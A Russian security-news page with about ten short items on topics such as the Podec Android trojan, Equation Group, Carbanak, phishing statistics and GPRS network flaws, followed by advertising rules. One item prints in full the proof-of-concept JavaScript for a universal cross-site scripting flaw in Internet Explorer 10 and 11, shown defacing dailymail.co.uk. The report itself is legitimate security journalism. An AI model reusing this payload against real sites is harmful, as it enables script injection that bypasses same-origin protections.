Главная Написать письмо Twitter Facebook RSS Новости



Согласно глобальному исследованию* «Лаборатории Касперского» по поведению детей в Интернете, в России в 2014 году 65% юных пользователей хоть раз обращались к порно-ресурсам, 38% – к сайтам с информацией об оружии, а 30% – к онлайн-казино. Эти цифры значительно выше аналогичных средних показателей по миру.

Россия укрепила свои позиции по числу обращений к нежелательному контенту, и без того занимая первое место в этом сомнительном рейтинге по результатам прошлого года. По данным исследования, в 2014 году 16% детей, хоть раз столкнувшихся с опасным контентом, были из России – это на 1,2 пункта больше чем в 2013-м. Схожий показатель отмечен у Индии – 13,4%. Далее с большим отрывом идут Китай, США и Вьетнам.

Однако во внимание следует принять не только долю детей, которые обращались к ресурсам с нежелательным содержанием, но и частоту этих запросов. Здесь картина иная: наибольшую активность демонстрировали в Китае – в среднем, на одного ребенка в 2014 году приходилось 208 срабатываний модуля «Родительский контроль». Следом идут США и Германия, а Россия со средним показателем 143 обращения находится на пятом месте.... Далее
Раздел: Информационная безопасность | Комментарии



Женщины очень любят и ценят Mac-устройства – по крайней мере, они ставят на них защитные решения в два раза чаще мужчин. В Интернет дамы выходят с целью совершить покупки, пообщаться и почерпнуть новые знания и умения. Они довольно охотно делятся своими личными устройствами, с детьми даже вдвое чаще, чем мужчины. В случае заражения компьютера или смартфона вирусной программой женщина с большей вероятностью купит новое устройство, чем потратит время и деньги на восстановление скомпрометированного гаджета. Ну а если все-таки решит «оживить» зараженный компьютер, то предпочтет доверить это специалистам. Из всей цифровой информации дамы больше всего дорожат личными фотографиями и очень переживают, что в случае киберинцидента они могут попасть к злоумышленникам. Возможно поэтому, решившись на установку защитного ПО, они будут использовать его «способности» по максимуму и активируют все имеющиеся в нем функции. ... Далее
Раздел: Информационная безопасность | Комментарии



Специалисты «Лаборатории Касперского» обнаружили SMS-троянца Podec, осуществляющего кражу денег у владельцев Android через тайную подписку на платные сервисы и способного обходить механизм CAPTCHA этих сервисов. Исследование показало, что основной площадкой распространения троянца служит социальная сеть «ВКонтакте».

Новый зловред примечателен своей функциональностью: он может отправлять сообщения на короткие номера, при этом корректно отвечая на запросы подтверждения оплаты услуги, а также подписывать жертву на платные сервисы, обходя механизм CAPTCHA, который призван отличать реального пользователя от бота. Такие возможности до этого не встречались ни в одном известном «Лаборатории Касперского» Android-троянце.

Наибольшее число попыток заражений (почти 4 тысячи уникальных пользователей) зарегистрировано в России, за ней с большим отрывом идет Казахстан и Украина (приблизительно 300 пользователей в каждой стране). Это неудивительно, учитывая, что основным каналом распространения является социальная сеть «ВКонтакте» – злоумышленники поддерживают в ней специальные группы, предлагающие пользователям Android скачать взломанные версии популярных приложений. При этом вместе с ожидаемой программой жертва получает установочный пакет троянца.... Далее
Раздел: Информационная безопасность | Комментарии





Доля фишинговых атак, направленных на похищение финансовых данных пользователей в России, составила 20% – об этом говорят результаты исследования, проведенного «Лабораторией Касперского» в 2014 году. При этом злоумышленники стали меньше использовать банковские бренды и сосредоточили свое внимание на интернет-магазинах и платежных системах.

В минувшем году совокупная доля финансового фишинга в общем объеме подобных атак сократилась по сравнению с 2013 годом почти на 9%, прежде всего за счет уменьшения объема банковского фишинга. Однако другие категории, наоборот, увеличили свою долю. В России имена известных интернет-магазинов использовались в 6% атак, а 5% срабатываний защитных технологий «Лаборатории Касперского» пришлись на фишинговые страницы, имитирующие платежные системы.

«Увеличение доли финансового фишинга, которое мы наблюдали в прошлом, привело к закономерной реакции со стороны компаний, наиболее часто используемых в мошеннических схемах. Они стали уделять больше внимания борьбе с каналами распространения фишинга, в частности с почтовым спамом, что в результате привело к снижению доли фишинга с использованием имен известных компаний. Однако злоумышленники незамедлительно переключились на новые «рынки». К примеру, в 2014 году мы впервые увидели резкий всплеск атак, эксплуатирующих названия сайтов, торгующих авиабилетами. Ранее подобные онлайн-площадки не пользовались такой популярностью у мошенников», – прокомментировала результаты исследования Надежда Демидова, контент-аналитик группы анализа веб-контента «Лаборатории Касперского».... Далее
Раздел: Информационная безопасность | Комментарии



Мощнее Stuxnet и Flame: «Лаборатория Касперского» обнаружила самого сильного на данный момент игрока в мире кибершпионажа

На протяжении многих лет «Лаборатория Касперского» изучала более 60 различных операций кибершпионажа по всему миру, однако то, что эксперты компании обнаружили совсем недавно, превосходит по своим масштабам, инструментам и эффективности все известные на сегодня вредоносные атаки. Кибергруппа, получившая название Equation Group, ведет свою деятельность на протяжении почти двадцати лет, и ее действия затронули тысячи, а возможно и десятки тысяч пользователей в более чем 30 странах мира. Наибольшее количество жертв Equation Group было зафиксировано в России и Иране.

В отличие от инструментов, цели злоумышленников вполне традиционны – это правительства и дипломатические структуры, военные ведомства, финансовые институты, предприятия телекоммуникационной, аэрокосмической, энергетической, ядерной, нефтегазовой и транспортной отраслей, компании, занимающиеся разработкой криптографических и нанотехнологий, а также СМИ, исламские активисты и ученые.

Инфраструктура Equation Group включает в себя более 300 доменов и 100 контрольно-командных серверов, расположенных в разных странах, в частности в США, Великобритании, Италии, Германии, Нидерландах, Панаме, Коста-Рике, Малайзии, Колумбии и Чехии. В настоящее время «Лаборатория Касперского» контролирует около 20 серверов группы.
... Далее
Раздел: Информационная безопасность | Комментарии



Угроза на миллиард: в рамках операции Carbanak киберпреступники украли миллиард долларов из 100 финансовых организаций по всему миру

В ходе совместного расследования «Лаборатория Касперского», Европол и Интерпол раскрыли беспрецедентную киберпреступную операцию, в рамках которой злоумышленники похитили миллиард долларов США. Киберограбление продолжалось два года и затронуло около 100 финансовых организаций по всему миру. Эксперты полагают, что за этим громким инцидентом стоит международная группировка киберпреступников из России, Украины, ряда других европейских стран, а также Китая.

Криминальная группировка, получившая название Carbanak, использовала методы, характерные для целевых атак. Однако в отличие от многих других инцидентов это ограбление знаменует собой новый этап: теперь киберпреступники могут красть деньги напрямую из банков, а не у пользователей.

Деятельность киберпреступников из банды Carbanak затронула около 100 банков, платежных систем и других финансовых организаций из почти 30 стран, в частности из России, США, Германии, Китая, Украины, Канады, Гонконга, Тайваня, Румынии, Франции, Испании, Норвегии, Индии, Великобритании, Польши, Пакистана, Непала, Марокко, Исландии, Ирландии, Чехии, Швейцарии, Бразилии, Болгарии и Австралии.

Как выяснили эксперты, наиболее крупные суммы денег похищались в процессе вторжения в банковскую сеть: за каждый такой рейд киберпреступники крали до 10 миллионов долларов. В среднем ограбление одного банка – от заражения первого компьютера в корпоративной сети до кражи денег и сворачивания активностей – занимало у хакеров от двух до четырех месяцев.... Далее
Раздел: Информационная безопасность | Комментарии



Количество утечек данных в 2014 году выросло на 49%Компания Gemalto (Euronext NL0000400653 GTO), мировой лидер в области цифровой безопасности, опубликовала последний отчет по Индексу критичности утечек данных (Breach Level Index), согласно которому в 2014 году в мире было зафиксировано более 1500 утечек данных, в результате которых было скомпрометировано около одного миллиарда записей данных. Полученные результаты свидетельствуют о том, что по сравнению с 2013 годом количество утечек данных увеличилось на 49%, а количество похищенных или скомпрометированных записей данных выросло на 78%.

Изначально составлявшийся компанией SafeNet (была приобретена Gemalto в 2014), Индекс критичности утечек данных (BLI) представляет собой глобальную базу данных утечек данных, пополняемую по мере публикации новостей об этих инцидентах. Индекс обеспечивает специалистам в области безопасности методологию и инструмент для оценки критичности того или иного взлома, позволяющий увидеть, какое место этот взлом занимает среди других инцидентов, информация о которых была опубликована в открытых источниках. Индекс определяет уровень критичности утечек данных по различным параметрам на основе публично доступной информации об утечках. ... Далее
Раздел: Информационная безопасность | Комментарии



Большинство абонентов считают, что работа через сотовую сеть достаточно безопасна, ведь крупный оператор связи наверняка позаботился о защите. Увы, на практике в мобильном Интернете есть множество лазеек, дающих широкие возможности для злоумышленников.

Исследователи Positive Technologies обнаружили уязвимости в инфраструктуре сетей мобильной связи, которые позволяют перехватывать GPRS-трафик в открытом виде, подменять данные, блокировать доступ к Интернету, определять местоположение абонента. Под угрозой оказываются не только мобильные телефоны, но и специализированные устройства, подключенные к 2G/3G/4G-сетям с помощью модемов: банкоматы и терминалы оплаты, системы удаленного управления транспортом и промышленным оборудованием, средства телеметрии и мониторинга и т.д.

Операторы сотовой связи, как правило, шифруют трафик GPRS между мобильным терминалом (смартфоном, модемом) и узлом обслуживания абонентов (SGSN) алгоритмами GEA-1/2/3, что осложняет перехват и расшифровку информации. Чтобы обойти это ограничение, злоумышленник может проникнуть в опорную сеть оператора, где данные не защищены механизмами аутентификации. Ахиллесовой пятой являются узлы маршрутизации (или шлюзовые узлы), которые называются GGSN. Их легко обнаружить, в частности, с помощью сервиса Shodan.io, предназначенного для поиска промышленных систем управления с доступом в Интернет. У проблемных узлов открыты GTP-порты, что позволяет атакующему установить соединение, а затем инкапсулировать в созданный туннель управляющие пакеты GTP. При правильном подборе параметров GGSN воспримет их как пакеты от легитимных устройств сети оператора.... Далее
Раздел: Информационная безопасность | Комментарии



Вчера стало известно о появлении ранее неизвестной уязвимости межсайтового скриптинга в Microsoft Internet Explorer. Используя эту ошибку, удаленный пользователь может внедрить в HTML-страницу произвольный JavaScript-сценарий в обход политики единства происхождения практически на любом сайте.

Исследователи из deusen.co.uk, разместившие PoC-код эксплойта, продемонстрировали эксплуатацию уязвимости на сайте первой по величине тиража ежедневной газеты Великобритании «Daily Mail» www.dailymail.co.uk. При нажатии на специально сформированную ссылку пользователь перенаправляется на сайт dailymail.co.uk, после чего ему выводится сообщение «Hacked by Deusen».

Сам код эксплойта выглядит следующим образом:

function go()
{
w=window.frames[0];
w.setTimeout("alert(eval(`x=top.frames[1];r=confirm(`Close this window after 3 seconds...`);x.location=`javascript:%22%3Cscript%3Efunction%20a()%7Bw.document.body.innerHTML%3D%27%3Ca%20style%3Dfont-size%3A50px%3EHacked%20by%20Deusen%3C%2Fa%3E%27%3B%7D%20function%20o()%7Bw%3Dwi
ndow.open(%27http%3A%2F%2Fwww.dailymail.co.uk%27%2C%27_blank%27%2C%27top%3D0%2C%20l
eft%3D0%2C%20width%3D800%2C%20height%3D600%2C%20location%3Dyes%2C%20scrollbars%3Dye
s%27)%3BsetTimeout(%27a()%27%2C7000)%3B%7D%3C%2Fscript%3E%3Ca%20href%3D%27javascript
%3Ao()%3Bvoid(0)%3B%27%3EGo%3C%2Fa%3E%22`;`))",1);
}
setTimeout("go()",1000);

Уязвимость присутствует в Internet Explorer 10.x и 11.x. Подробное описание уязвимости доступно по адресу: http://www.securitylab.ru/vulnerability/470863.php.

Эксперты Positive Technologies отмечают, что в сети уже появилось несколько примеров использования уязвимости, из которых видно, что под угрозой находятся множество сайтов, включая критических ресурсы.... Далее
Раздел: Информационная безопасность | Комментарии (3)



По данным «Лаборатории Касперского», за последний год количество недоверенных цифровых сертификатов, подписывающих вредоносное или нежелательное ПО, выросло вдвое. Таким образом, к концу 2014 года в антивирусной базе защитных продуктов, производимых компанией, общее количество скомпрометированных сертификатов превысило 6 тысяч.

Между тем, наличие цифровых подписей у файлов до сих пор у многих пользователей ассоциируется с их безопасностью и заведомым отсутствием вредоносного кода. Системные администраторы нередко строят политику информационной безопасности компании на том, что автоматически разрешают запускать файлы, подписанные цифровыми сертификатами, а ряд антивирусных решений считают программу безопасной, если она имеет действительную цифровую подпись.

Однако наличие сертификата не является стопроцентной гарантией безопасности программы. Многие нашумевшие кампании кибершпионажа осуществлялись при помощи зловредов, имевших вполне доверенные цифровые подписи. Так, червь Stuxnet, нанесший ощутимый удар по иранской ядерной программе, использовал украденные сертификаты Realtek и JMicron. Хакерская группировка Winnti, кравшая конфиденциальную информацию у разработчиков компьютерных игр, заполучила также их цифровые сертификаты, которые использовались злоумышленниками в дальнейших атаках. Наконец, масштабная операция кибершпионажа в отношении топ-менеджеров крупных компаний, известная как Darkhotel, также не обошлась без цифровых сертификатов, которые киберпреступники создавали самостоятельно, получив доступ к секретным ключам. ... Далее
Раздел: Информационная безопасность | Комментарии


Страница: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19

№8 - 2013


В октябрьском номере журнала "Безопасность: Информационное обозрение" мы рассмотрели такие важные вопросы, как правила построения кадровой и информационной безопасности компании, выявление рисков корпоративного мошенничества и подбор частного охранного предприятия.
Календарь
01.01.1970



Copyright © 2000-2017 "Центр Компьютерного моделирования "Перспектива" Тел: +7 (926) 011-67-54 E-mail: info@csc.ru
Новости | Интервью | Пресс-релизы | События

Все поля необходимы для заполнения.






Введите e-mail указанный при регистрации.



Для того чтобы иметь доступ к полному тексту статьи необходимо быть зарегистрированным пользователем и авторизоваться.
Для того чтобы иметь возможность просматривать журнал необходимо быть зарегистрированным пользователем и авторизоваться.

Макеты принимаются на компакт-дисках CD-R ,CD-RW, DVD-R, DVD-RW, устройствах, поддерживающих USB. Файлы также могут быть отправлены с помощью электронной почты.

Редакция журнала "Безопасность: информационное обозрение" серьезно относится к художественному оформлению журнала. В случае, если рекламные макеты вызывают замечания с художественной точки зрения, редакцией журнала может быть предложена разработка нового оригинал-макета.

Требования к форматам файлов

Макеты в прочих форматах обсуждаются индивидуально.

Не принимаются оригинал-макеты в форматах Microsoft Word, Excel, Power Point.

Требования к элементам макета издания

Все элементы, печатаемые в край полосы (под обрез) должны иметь "вылет" за край обрезного формата (доливку под обрез) - 5 мм.

Требования к содержанию рекламных материалов:

• Рекламные материалы должны соответствовать требованиям действующего законодательства РФ.
• Реклама должна соответствовать содержанию той страницы сайта, на которую ведет рекламная ссылка, быть достоверной, не вводить потребителя в заблуждение.

Требования к сайту рекламодателя:

• На странице сайта рекламодателя, на которую ведет рекламная ссылка, не должны открываться дополнительные окна (PopUp или PopUnder).
• Страница, на которую ведет рекламная ссылка, должна корректно открываться в браузере и не содержать ошибок скриптов и программ.
• Если страница сайта, на которую ведет рекламная ссылка, при размещении или в ходе рекламной кампании не отвечает или открывается некорректно, размещение будет приостановлено до исправления ошибки.

Иные требования:

• Администрация Securityinfowatch.ru оставляет за собой право отклонить любой рекламный материал без объяснения причин.

Поддерживаемые форматы баннеров

Поддерживаемые форматы JPG, PNG.

Размеры размещаемых баннеров в пикселях 990x90, 728x90, 245x245, 245x50.

Допустимый размер баннера в килобайтах определяется его размером в пикселях:

Рекламный баннер должен иметь видимые границы, т.е. быть обведенным в рамку, не совпадающую с цветом фона (по умолчанию белым).

При необходимости наши специалисты изготовят необходимый Вам баннер. Условия изготовления и расценки обсуждаются индивидуально и зависят от уровня сложности работ.